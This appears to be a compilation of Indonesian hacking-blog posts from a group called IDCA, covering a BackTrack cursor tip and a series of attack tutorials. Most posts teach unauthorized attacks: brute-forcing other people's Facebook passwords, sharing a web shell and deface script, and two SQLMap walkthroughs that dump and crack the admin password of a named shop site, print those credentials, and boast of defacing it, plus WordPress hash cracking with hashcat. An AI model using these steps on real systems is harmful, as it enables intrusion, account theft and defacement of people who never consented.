Mengganti Cursor di Backtrack 5

Selamat sore teman teman IDCA :D

Oke sesuai judul, ane mau bagi trik yang ane dapet hasil dari searching nih, langsung aja yah ..

Monggo disimak, yang make Windows jangan iri yaaaaa, cos ini cuma buat yang make backtrack aja :D :D :P

1. Buka terminal/console dulu om, lalu masukan perintah :

apt-get install oxygen-cursor-theme-extra

2. Tunggu proses sampek selesai, kalau sudah tinggal dibuka deh :

Klik kanan -> Change Desktop Background -> Theme -> Costumizer -> Pointer

Nah keren kan XD XD , selamat mencoba :)

Refrensi : disini

Content Creator : Bimo Septiawan

Shell IDCA First Edition

Assalamuallaikum :D

Bingung mau share apa lagi, nih aku share SHELL aja yah ^_^

Fiturnya cukup lengkap kok :D

[+] PENAMPAKAN [+]

~# LOGIN SHELL #~

~# PENAMPAKAN SHELL #~

Password Shell :: idca

Download Here 

Happy Hacking :D

Content Creator : Bimo Septiawan

Tool Hack Akun Facebook 2013

Assalamualaikum...

Nih ane punya aplikasi hack facebook (kata org2 :3) yg bisa sobat gunakan untuk menemukan password dari akun facebook orang lain :D caranya penggunaaanya sangat mudah dan simple aja kok,, yuk disimak :D untuk pengguna windows, disarankan untuk melengkapin bahan2 yg telah dilampirkan agar aplikasi tersebut bisa berjalan dengan baik :) dan sebelumnya tools ini sudah ane coba, dan masih work 100% :D

UPDATE : Not Working on Windows XP :p dan Bacanya ampe abis!!!!!!!!

Bahan - Bahan

1. Python 2.7 | Download

2. Aplikasi Hack Facebook | Download Password: Lihat

3. Wordlist | Use your brain :p (pikirkan kira2 passwordnya apaan)

4.Mechanize | Baca bagian bawah! :p

Langkah - Langkah

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Download dulu bahan2 lalu install Python 2.7 nya, kemudian extract file tool hack FB nya, kalo ane di extract di partisi D:\

Kemudian buka terminal sobat dan masuk ke directori D:\facebook

Setelah itu jalankan toolnya dengan cara ketik facebook.py lalu enter! masukkan email/username akun facebook target lalu enter! trus masukin juga nama file password list yg isinya merupakan kumpulan dari kombinasi kata, huruf dan angka, lalu enter!

Sekarang tinggal nunggu hasilnya, lama prosesnya tergantung dari banyaknya wordlist yg digunakan! kalo punya ane cuma 1GB, jadi sekitar beberapa menit menit aja :D

kalo seandainya sobat meengalami error saat menjalankan toolsnya, silahkan install Mechanize! Download disini! cara installnya via terminal masuk dulu ke directori mechanize, lalu ketik perintah : setup.py install lalu enter! liat gambar!

Setelah menunggu beberapa saat, ketemu dah passwordnya :D

Nah tinggal Login aja ke Facebooknya :D

Akun ini milik Onix AQua

Udah yaa, Selamat mencoba aja.. Goodluck!! :D

Note: " Semakin banyak wordlistnya semakin bagus :D karna cara kerja tools ini menebak password berdasarkan wordlist yg tersedia, usahakan buat wordlistnya se unik mungkin utk hasil yg lebih maksimal :D "

Sekian tutorial singkat dari ane, mudah2an bermanfaat yah :p

Content Creator : Onix AQua

Script Deface : Logo g3tar

Assalamualaikum,  :D

Pas ane berkunjung ke webnya om Zandy, ane nemuin tuh di postingnya "Script Deface Keren" nah ane jadi kepikiran mau bikin artikel terkait juga ^_^

Nah bagi yang mungkin belum bisa buat script sendiri ane kasih beberapa contoh script nantinya ^_^
Oke, nih yang pertama ane kasih satu dulu script deface yang keren :D , daripada pusing-pusing nyusun script langsung ambil aja script ini :D

[+] PENAMPAKAN [+]

Ambil Scriptnya DISINI

Silahkan edit sesuka kalian :D

Recode dari Scriptnya K4C3 Undetected kayaknya :D

Cara Mengundang Seluruh Teman Untuk Like FP Kamu

Assalamualaikum :)

Kali ini ane mau share tutorial tentang "Trik Facebook" hehe , sekali kali main main ke facebook lah bosen kalo mpes mpes mulu KWOKWOKWO ..

oke sekarang ane mau share trik "AUTO INVITE LIKE FANS PAGE FB" , nah maksudnya apaan coba ?

itu loh kayak kita mengundang temen kita buat like FP kita, nah kalo mau invite semua kan capek tuh temen juga udah bejibun banyaknya KWOKWOKW XD

Nih gua kasih tips/trik biar gak perlu capek capek :)

1. Ambil Script auto invite fanspage facebook disini

2. Selanjutnya silahkan login ke Facebook, dan buka Fanspage atau Halaman Facebook yang anda kelola.

3. Buka web "Console".

• Pengguna Google Chrome, tekan tombol Ctrl+Shift+J
• Pengguna Mozilla Firefox, tekan tombol Ctrl+Shift+K

4. Copy Script tadi, lalu Pastekan ke Console

5. Silahkan tunggu beberapa saat, hingga script proses selesai.

6. Hasilnya banyak teman facebookmu yang menyukai halaman yg anada kelola :)
Selamat mencoba :*

Tags : Auto Invite, Cara Cepat Dapat Like Banyak, Auto , Bot Invite, Script Invite, Trik FP, Trik FB

Deface Dengan SQLMAP di WINDOWS 7

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+] BAHAN [+]

• Python [tonjok saya]
• Sqlmap [remas saya]
• Dork : inurl:/.php?*id=

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

• http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

• cd\sqlmap\ , maka hasilnya akan seperti ini :

2. Stelah itu, kalian mulailah scan website target dengan perintah :

• sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]

3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :

• sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :

4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :

• sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :

5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :

• sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump

Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :

• do you want to crack them via a dictionary-based attack? [Y/n/q] 

Maka Hasilnya akan seperti ini :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Sama kan kayak make BACKTRACK 5 :D

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404

Deface Dengan SQLMAP di Backtrack 5

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

• Python | Available on Backtrack
• Sqlmap | Available on Backtrack

[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)

2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah

• cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :

• python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)

4. Setelah dapet nama Data Basenya kita ketikan printah :

• python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :

5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

• python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

• python sqlmap.py -u http://www.target.com -D nama_database -T table --dump

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

• do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404

Crack Hash MD5(wordpress) dengan Hashcat

Assalamualaikum.. :)

Hay Sobat, ketemu lagi dahh :D Pernah liat yg seperti dibawah ini? :D

$P$B12345678SK.X5r1iISZN0baAvEvEj0
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.

Nah, ane sekarang mau share tentang trik bagaimana ngecrack password hash yang digunakan pada web yg menggunakan CMS Wordpress. Soalnya ane liat banyak sekali yang masih bingung bagaimana caranya bahkan ga tau sama sekali tentang password hash wordpress. berbeda dengan password hash MD5 rata2 tools decript/crack nya udah bertebaran dimana-mana baik offline maupun online. 

Saran ane kalo mau bisa crack password hash harus tau dulu jenis-jenis hash tersebut. silahkan sobat cari dah di google banyak berserakan :D banyak baca banyak ilmu :p

Cukup dah ngomel ngomelnya :D langsung ke TKP :D

Sediakan Bahan - Bahan :

1. Hashcat | Download Password: Lihat

2.Wordlist | Download | Download

3.Sedikit Otak, dan Kesabaran :p

Langkah - Langkah:


Pertama extrack file hashcat dan wordlist dipartisi disk yg sobat inginkan, kalo ane disini ane letak di partisi D:\ liat gambar baik2 tuh :D

Lalu buka Hashlist.txt dan masukkan Hash yg mau sobat crack, dan save lagi :D

Selanjutnya buka terminal command, cari aja di Start>Run>ketik cmd! dan enter!

Setelah terminal terbuka, posisikan directori ke folder D:\Hashcat. liat gambar!

Selanjutnya ketik perintah : hashcat-cli32.exe -m 400 hashlist.txt wordlist.txt  lalu enter!

Silahkan sobat tunggu beberapa tahun yah :D eh, beberapa saat :D tunggu ampe selesai aja ;)

Nah tuw, udah keluar hasilnya :


$P$B12345678SK.X5r1iISZN0baAvEvEj0:l4I2GL4HsK7Tw
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0:r3dm0nd_admin
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/:4dm!n_w38
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0:w38m45t3r
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.:!nd0n3s!4n_cy83r_4rmy

Note: "Biar lebih maknyoooss, banyakin aja wordlistnya :D punya ane ampe 1 GB :3"

Jika sobat ingin meggunakan perintah2 yg lain atau mau coba crack hash jenis yg lain, silahkan sobat ketik perintah :  hashcat-cli32.exe --help

Sekian tutorial singkat dari ane, kalo ada yg kurang mohon dikoreksi, ntar ane perbaiki :D

Wasalamualaikum..

Contet Creator: Onix AQua